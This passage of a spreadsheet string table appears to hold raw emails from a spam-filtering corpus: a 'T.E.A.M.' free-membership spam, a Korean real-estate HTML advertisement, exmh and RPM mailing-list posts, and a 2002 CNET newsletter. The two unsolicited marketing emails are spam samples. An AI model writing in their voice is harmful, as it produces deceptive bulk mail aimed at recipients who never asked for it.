 T.E.A.M.  You owe it to yourself to at least look.  Click on the link
 below.
 ...............&gt; For your Free Membership, Click this link: 
 mailto:teamsuccessrequest@yahoo.com?subject=I_Want_A_Free_Membership
 Be sure to include your first and last name in the body of the leter
 Or to be removed from my mailing list, Click this link:
 mailto:teamsuccessrequest@yahoo.com?subject=remove 
 =============================================
 Thank you very much for your precious time!
 Sincerely,  D.Woodward
 &lt;a href="mailto:teamsuccessrequest@yahoo.com?
 subject=I_Want_A_Free_Membership"&gt;mailto:teamsucc
 essrequest@yahoo.com?subject=I_Want_A_Free_Membership&lt;/a&gt;
 Be sure to include your first and last name in the body of the leter
 To be removed from this mailing list, please click this link:
 mailto:teamsuccessrequest@yahoo.com  and reply with "remove" in the 
 subject line.
 aromttixnthdxslmcxklhukpevnjqgwebbsyq
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: []ε ޾ƺ
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;=BA=CE=B5=BF=BB=EA=C1=A4=BA=B8=B3=AA=B6=F3&lt;/title&gt;
 &lt;/head&gt;
 &lt;body text=3Dblack vLink=3Dpurple aLink=3Dred link=3Dblue bgColor=3Dwhite=
 &gt;
 &lt;table cellSpacing=3D0 cellPadding=3D0 width=3D688&gt;
 &lt;tr&gt;
 &lt;td width=3D688 colSpan=3D3 &gt;
 &lt;p &gt;
     &lt;img height=3D75=20
       src=3D"http://www.informland.co.kr/kong/mail_01.gif" width=3D696 bo=
 rder=3D0=20
       &gt;
 &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;tr &gt;
             &lt;td width=3D688 colSpan=3D3 height=3D11&gt;&lt;p align=3Dcenter &gt;
     &lt;img height=3D142=20
       src=3D"http://www.informland.co.kr/kong/mail_02.gif" width=3D607 bo=
 rder=3D0=20
       &gt;&lt;/p&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr &gt;
             &lt;td width=3D37 height=3D819&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;/td&gt;
     &lt;td width=3D614 background=3Dhttp://www.informland.co.kr/kong/mail_bg=
 .gif=20
     height=3D819&gt;
         &lt;table width=3D"509" cellSpacing=3D0 cellPadding=3D0 align=3Dcent=
 er=20
      &gt;
             &lt;tr&gt;
         &lt;td width=3D"509" &gt;
             &lt;p &gt;
                 &lt;img height=3D153=20
             src=3D"http://www.informland.co.kr/kong/mail_03.gif" width=3D=
 535=20
             border=3D0&gt;
             &lt;/p&gt;
         &lt;/td&gt;&lt;/tr&gt;
                     &lt;tr &gt;
                         &lt;td width=3D509&gt;&lt;p align=3Dcenter &gt;
                 &lt;img height=3D207=20
             src=3D"http://www.informland.co.kr/kong/mail_04.gif" width=3D=
 472=20
             useMap=3D#ImageMap1 border=3D0&gt;&lt;/p&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr &gt;
                         &lt;td width=3D509&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                 &lt;tr&gt;
                     &lt;td width=3D"509" height=3D8&gt;
                         &lt;p&gt;
                 &lt;img height=3D141=20
             src=3D"http://www.informland.co.kr/kong/mail_05.gif" width=3D=
 523=20
             border=3D0&gt;&lt;/p&gt;
                     &lt;/td&gt;
                 &lt;/tr&gt;
                     &lt;tr &gt;
                         &lt;td width=3D509 height=3D10&gt;&lt;p align=3Dcenter &gt;
                 &lt;img height=3D204=20
             src=3D"http://www.informland.co.kr/kong/mail_06.gif" width=3D=
 473=20
             useMap=3D#ImageMap2 border=3D0=20
       &gt;&lt;/p&gt;&lt;/td&gt;
                     &lt;/tr&gt;
         &lt;/table&gt;
                     &lt;h2 align=3Dcenter &gt;
                         &lt;i &gt;&lt;b=20
       &gt;
             &lt;span style=3D"FONT-SIZE: 11pt"=20
      &gt;=B9=AE=C0=C7=C0=FC=C8=AD 02-2613-1470 =BA=CE=B5=BF=BB=EA=C1=A4=BA=B8=
 =B3=AA=B6=F3&lt;br&gt;&lt;a=20
       href=3D"http://www.informland.co.kr" target=3D_blank=20
       &gt;http://www.informland.co.kr&lt;/a&gt;&lt;br=20
       &gt;=20
             E-mail &amp;nbsp;:&lt;A href=3D"mailto:total@informland.co.kr" &gt;tota=
 l@informland.co.kr&lt;/A&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;
                     &lt;/h2&gt;&lt;p align=3Dcenter &gt;=BC=F6&lt;font size=3D2&gt;=BD=C5=C0=
 =BB=20
       =BF=F8=C4=A1=BE=CA=C0=B8=BD=C3=B8=E9 "&lt;/font&gt;=20
              &lt;font color=3Dblue size=3D2=20
      &gt;=BC=F6=BD=C5=B0=C5=BA=CE&lt;/font&gt;
             &lt;font size=3D2&gt;" =B8=A6 =C5=AC=B8=AF =C8=C4=20
       "&lt;/font&gt;&lt;font size=3D"2" color=3Dred&gt;  =BA=B8=B3=BB=B1=E2&lt;/font&gt;&lt;fo=
 nt size=3D"2"=20
      &gt; " =B9=F6=C6=B0 =B8=A6 =B4=AD=B7=AF =C1=D6=BD=C3=B1=E2 =B9=D9=B6=F8=
 =B4=CF=B4=D9&lt;/font&gt;&lt;/p&gt;&lt;p align=3Dcenter&gt;&lt;font size=3D"2"=20
      &gt;[&lt;/font&gt;&lt;A href=3D"mailto:total@informland.co.kr" &gt;
             &lt;font color=3Dred size=3D2&gt;=BC=F6=BD=C5=B0=C5=BA=CE&lt;/font&gt;=20
                  &lt;/A&gt;&lt;font size=3D"2"&gt;]&lt;/font&gt;=20
                &lt;/p&gt;&lt;p align=3Dcenter&gt;&lt;font size=3D"2"=20
      &gt;&lt;/font&gt;&amp;nbsp;&lt;/p&gt;
     &lt;/td&gt;&lt;td width=3D37 height=3D819&gt;
             &lt;p &gt;&amp;nbsp;&lt;/p&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;tr&gt;
         &lt;td width=3D"37" height=3D"10"&gt;
             &lt;p&gt;&lt;/p&gt;
     &lt;p&gt;
     &lt;/p&gt;
         &lt;/td&gt;
         &lt;td width=3D"614" height=3D"10" background=3Dhttp://www.informlan=
 d.co.kr/kong/mail_07.gif=20
    &gt;
             &lt;p&gt;&lt;/p&gt;
         &lt;/td&gt;
             &lt;td width=3D37 height=3D10&gt;
         &lt;p &gt;
         &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;
             &lt;tr&gt;
         &lt;td width=3D"688" height=3D"4" colSpan=3D3&gt;
             &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
     &lt;p&gt;&amp;nbsp;
     &lt;/p&gt;
         &lt;map name=3DImageMap1=20
  &gt;
             &lt;area shape=3DRECT target=3D_blank coords=3D328,160,452,186=20
   href=3D"http://www.informland.co.kr"&gt;
         &lt;/map&gt;
 &lt;map=20
 name=3DImageMap2&gt;
 &lt;area shape=3DRECT target=3D_blank=20
   coords=3D328,157,452,184 href=3D"http://www.informland.co.kr"&gt;&lt;/map&gt;
 &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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--==_Exmh_778588528P
 Content-Type: text/plain; charset=us-ascii
 On Tue, 20 Aug 2002 22:51:52 EDT, Valdis.Kletnieks@vt.edu said:
 &gt; Ever tried to get MH to *not* have a 'pseq' sequence?  I suspect everybody's
 &gt; looking at a big box that has unseen and pseq in it.  Might want to add
 &gt; 'pseq' to the 'hide by default' list....
 Was it intended that if you added a sequence to the 'never show' list that
 it not take effect till you stopped and restarted exmh?  I added 'pseq',
 then hit 'save' for Preferences - didn't take effect till I restarted.
 --==_Exmh_778588528P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 Comment: Exmh version 2.5 07/13/2001
 iD8DBQE9YzUIcC3lWbTT17ARAkTxAJ980YijxjLdlJABtcs4uJwQwN0EnwCdHjOG
 tFqGIQwIX8IwCFsDpTRtqw0=
 =oMZd
 -----END PGP SIGNATURE-----
 --==_Exmh_778588528P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Feb 04, 2002 at 04:53:14PM +0100, Matthias Saou wrote:
 &gt; It skips it. See the /etc/apt/apt.conf file for this.
 In my apt.conf reads:
 --&lt;snip&gt;--
 RPM
 {
    // Leave list empty to disable
    AllowedDupPkgs {"^kernel$"; "kernel-smp"; "kernel-enterprise"; };
    HoldPkgs {"kernel-source"; "kernel-headers"; };
 }
 --&lt;/snip&gt;--
 If I understand this correctly, then only kernel-source and kernel-headers 
 are held from being installed, but kernel will be installed, right?
 Maybe I should test this on some vanilla system...
 -- 
 Peter
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Microsoft reveals media XP details&lt;/title&gt;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&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b2-M4pwQX0aTcwkz57jM2cmpxUCPunR" target="new"&gt;   
 &lt;img src="http://ad.doubleclick.net/ad/N1090.cnet/B926801.16;sz=160x600;ord=[timestamp]?" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=c7-KG43QLPWuluHBi7NWtUoF24wxeeR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=dc-40zzQ0Lrt5wGQTSBz6gEwTinhlyR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWqlq9OQ-0pvVdi5Z7ednR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rqvhXhh1biqzUbrvLkiDeR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr4T1qGgeEn9kgGa2oXqGyR"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16, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Microsoft reveals media XP details&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Mac tech show set to open in New York&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 HP trims Jornada unit in Singapore&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Tech giants hot on wireless union&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Universal appoints head of anti-piracy&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Report: FDIC not protecting data&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Special report&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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&lt;b&gt;A clause for alarm&lt;/b&gt;&lt;br&gt;
 Learn to spot red flags in corporate software contracts ere you sign on the dotted line.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsV6Ad70PyLxjkqVAXXblR" &gt;Read Full Story&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;Microsoft reveals media XP details&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Microsoft on Tuesday gave an official name to an upcoming version of Windows XP that aims to make the PC a permanent part of the home entertainment center.
 Originally code-named Freestyle, this entertainment version of Windows--which will go by the name Windows XP Media Center Edition--will appear on new PCs and PC hybrids in time for the holidays, the company revealed on Tuesday. With Windows Media Center, consumers will be able to use a TV remote control to catalog songs, videos and pictures, as well as check TV listings.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=46-19zwInpD4B2Y8RXa1cN0535V0Y9R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Mac tech show set to open in New York&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Apple's iMac is all display--17 inches worth--and the "Jaguar" update to the Mac OS should bare its teeth as the Mac faithful gather in New York. They'll be looking to get a peek at what the computer maker has planned for the future.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002, 4:00 a.m. PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDBUiTY8bxCjjvDSwizzcR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;HP trims Jornada unit in Singapore&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Hewlett-Packard has shuffled employees out of its Jornada Pocket PC development unit in Singapore, as the company continues to cut costs following its merger with Compaq Computer.
 Jornada products are developed in Singapore and will be phased out by year's end, with the exception of Jornada 720, which resembles a mini-notebook. The model will eventually be rebranded as an HP iPaq device.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002, 11:05 AM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6DGeoOomKns2asfI8UkRR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Tech giants hot on wireless union&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Several tech and telecommunications giants are considering a joint venture to pepper the United States with wireless hot spots, according to reports.
 Intel, IBM, AT&amp;T Wireless, Verizon Communications and Cingular Wireless are discussing the creation of a company that would build a network of wireless hot spots across the country, The New York Times reported Tuesday. Hotspots are publicly available wireless networks that use the 802.11b standard to deliver Internet access.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002, 7:50 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJoJiLDBskSjaeTldfVpf4R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Universal appoints head of anti-piracy&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Universal Music Group has created a new full-time position to help it combat piracy.
 Lawyer and former music-television producer David Benjamin will fill the role as UMG's new senior vice president of anti-piracy.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002, 11:45 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo_-wLIms0dAVJ9PZAKTrR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Report: FDIC not protecting data&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Weaknesses in the Federal Deposit Insurance Corp.'s IT strategy have left financial information open to attack, a new report says.
 The report from the General Accounting Office identified "new weaknesses" in the FDIC's information systems controls that affect its ability to safeguard electronic access to sensitive data.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002, 8:55 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJrckcQeQadxQMKtNX8PQiR"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&lt;b&gt;Bezos believes&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 "We're still at the very beginning," says Amazon.com's founder. "There's so much more to come."
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaAp9JASQzSROUJEymxqPR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;Stronger, smarter building in less time&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Pioneers in computer-aided design, architects are now using advanced technology to model their designs in ever-greater detail.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 16, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq2iKG9REbjsMVKpv3DxnR"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href="http://clickthru.online.com/Click?q=ef-04uYQmkH9uWT13bqBxDVAmoBameR"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href="http://clickthru.online.com/Click?q=04-k9W0IFQXAWVPUR798BbBL7kOi_yR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXwP80M1iKMZ2Fz8IR7XlR"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href="http://clickthru.online.com/Click?q=2f-hYaFIqnzFV2Fj_BP26D_8gaZjMeR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtiCbfhz-EMLKlXBDgnVsR"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href="http://clickthru.online.com/Click?q=59-y53oIEntHCekwBSlpW-B_KMqztFR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES_KsKfDRQA5K-fxuEL59R" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ71uYb87UtuoAABMMPZ9rR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_za61WIqRcCW5CH7esbKRiR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEBSOi0NBZQhaIHsSzky0PR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRhXPo4sgVnxXFZcIuInR"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src="http://news.cnet.com/i/ne/bb/2002/07/0715_apple.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWMg5gz74mkSWreAgRDciR" &gt;'Jaguar' may show its claws at MacWorld&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Correspondent Melissa Francis and CNET News.com reporter Ian Fried talk about Jaguar, the anticipated update to Mac OS X and new, larger iMac flat-panel screens, both expected to be unveiled at this week's MacWorld.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVqRJVDZalxv3orMjEsaQPR" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8cJHgl11_XGuwrfzJ6nnR"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href="http://clickthru.online.com/Click?q=17-agitI5XroK904GFIz4s1RhjGRseR" &gt;
 Norway snubs exclusive Microsoft deals&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0DRUHv2G2c-r7MBvWpjuyR" &gt;
 McAfee.com sour on sweetened bid&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=42-rF7cIPKS0-8eQH8pz3F7_4EMIrdR" &gt;
 AT&amp;T, Sun come up with services deal&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=57-YJIXII04A-MD6w7F0F_wt9Q9dZuR" &gt;
 Schwab profit falls with investor confidence&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuPjQQ-l8wjKQCL5-NPyEdsR" &gt;
 Tech stocks seek good earnings news&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KB8dmvu2ppqfRO9R6BpKlR" &gt;
 More hurdles await e-government&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduIRbIk1RjZWSoS2P4Jm4R" &gt;
 Industry preps for new cell standard&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdiyXneMuXydit0M-0OvrR" &gt;
 Nextel turns profit on customer demand&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2dMnNXS641H99K8FZuSiR" &gt;
 TDS, U.S. Cellular end quarter with losses&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1GR37boNHCu4jNix1DPPR" &gt;
 Radio stations appeal Web royalties&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4XV2vQ31AwQ4lAUw-5WnR" &gt;
 Licensing decision ends MPEG-4 tiff&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4myiy6tRZxrhBm0WHtheR" &gt;
 Congress to weigh in on digital TV&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zGNmcyuy8ZvQIzTKtR1yR" &gt;
 Moxi moves into cable boxes&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIPMzz5gfbabman8WccrYnR" &gt;
 Dell squeezes Pentiums into notebooks&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMWSIVypy7Hcoh57BymNzeR" &gt;
 Santa goes digital&lt;/a&gt;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href="http://clickthru.online.com/Click?q=54-l6ovIZKA72QU4-40O9U4lR0vdksR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=69-CYziz2WZSOPOlfdBm-5SgAlnP-RPl9RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=7e-XDXeInptF7HqFQwi6pURwMpopr9R" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQ3Vjt0HjcTYjvQ8Rgn5rR"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href="http://clickthru.online.com/Click?q=a8-02XZQQZkruy8LBCDtZs6swzdONiR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=be-B7ixQCpTpl-sN_pbnY9y52GfwH4R" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJPaYBmqH02K74p01K7fy3rR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfk8UQBZe6FrAP_kMFIM55iR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1reIyr_O_Iti64Q9t8PR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
